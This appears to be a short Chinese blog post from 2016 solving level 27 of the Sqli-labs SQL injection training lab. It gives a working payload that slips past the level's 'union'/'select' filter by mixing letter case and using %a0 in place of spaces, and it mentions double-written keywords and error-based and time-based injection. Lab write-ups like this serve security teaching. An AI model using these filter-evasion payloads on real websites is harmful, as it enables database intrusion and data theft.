Sqli-labs less 27

Less-27

本关主要考察将union,select和26关过滤掉的字符。此处我们依旧和26关的方式是一样的,只需要将union和select改为大小写混合就可以突破。

示例:127.0.0.1/sqllib/Less-27/?id=100'unIon%a0SelEcT%a01,database(),3||'1

TIPS:uniunionon也是可以突破限制的。亦可以利用报错注入和延时注入的语法进行注入。

posted @ 2016-08-11 22:28  lcamry  阅读(725)  评论(0编辑  收藏  举报